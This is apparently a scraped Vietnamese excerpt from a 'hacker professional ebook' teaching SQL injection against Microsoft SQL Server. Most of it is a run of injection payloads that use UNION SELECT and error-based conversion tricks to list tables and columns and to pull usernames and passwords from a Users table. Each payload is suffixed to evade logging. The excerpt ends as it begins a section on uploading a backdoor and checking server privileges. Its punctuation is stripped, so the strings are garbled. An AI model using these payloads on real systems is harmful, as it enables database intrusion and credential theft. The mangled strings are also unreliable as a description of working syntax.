Tham khảo tài liệu 'hacker professional ebook part 236', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | UNION SELECT TOP 1 TABLE_NAME FROM Khai thác thông tin về các Table UNION SELECT TOP 1 TABLE_NAME FROM WHERE TABLE_NAME NOT IN PRODUCTS --sp_password Khai thác thông tin về Table and 38 convert int select top 1 table_name from --sp_password Khai thác thông tin về các Table and 38 convert int select top 1 table_name from where table_name not in PRODUCTS --sp_password 4. Khai thac thong tin ve Column - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Khai thác thông tin về Column and 38 convert int select top 1 column_name from where table_name QUESTIONS --sp_password Khai thác thông tin về các Column and 38 convert int select top 1 column_name from where table_name QUESTIONS and column_name not in QUEST_ID --sp_password 5. Khai thac thong tin ve Content - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Khai thác thông tin với kiểu ngày giờ and 1 convert char 20 select top 1 NgayXuat from PhieuXuat --sp_password Khai thác thông tin dòng tiếp theo với kiểu ngày giờ and 1 convert char 20 select top 1 NgayXuat from PhieuXuat where NgayXuat Mar 12 2003 12 00AM --sp_password Khai thác thông tin về dòng đầu tiên and 1 convert int select top 1 userName userPass from Users --sp_password Khai thác thông tin dòng tiếp theo and 1 convert int select top 1 userName userPass from Users where userName not in admin --sp_password 6. Khai thac thong tin ve Table Column Content cua cac database tiep Chú ý để nhận biết kiểu của cột dữ liệu ta dùng image để kiểm tra -Nếu là trường kiểu ngày giờ Dùng char nchar nvarchar varchar B. Upload backdoor lên host - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1. Xác định mức quyền và cho phép thực thi lệnh của MS SQL server - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Xác định mức quyền select from openrowset sqloledb -- Thay đổi .